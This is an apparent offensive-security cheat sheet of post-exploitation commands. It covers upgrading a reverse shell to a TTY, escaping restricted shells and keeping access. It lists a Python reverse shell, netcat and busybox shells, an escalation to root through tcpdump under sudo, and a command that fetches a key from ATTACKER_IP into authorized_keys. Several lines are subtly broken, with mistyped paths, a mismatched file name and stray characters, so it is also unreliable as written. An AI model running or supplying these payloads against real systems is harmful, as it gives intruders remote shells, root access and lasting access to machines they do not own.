Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin export TERM=xterm export SHELL=bash
Add public key to authorized keys:
$ echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys
Some payloads to overcome limited shells:
$ ssh user@$ip nc $localip 4444 -e /bin/sh enter user's password $ python -c 'import pty; pty.spawn("/bin/sh")' $ export TERM=linux
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
$ echo os.system('/bin/bash')
$ /bin/sh -i
$ exec "/bin/sh";
$ perl —e 'exec "/bin/sh";'
From within tcpdump
$ echo $’id\n/bin/netcat $ip 443 -e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -I eth- -w /dev/null -W 1 -G 1 -z /tmp/.tst -Z root
From busybox
$ /bin/busybox telnetd -|/bin/sh -p9999
:!bash :set shell=/bin/bash:shell !bash find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; awk 'BEGIN {system("/bin/bash")}' --interactive echo "os.execute('/bin/sh')" sudo nmap --script=exploit.nse perl -e 'exec "/bin/bash";'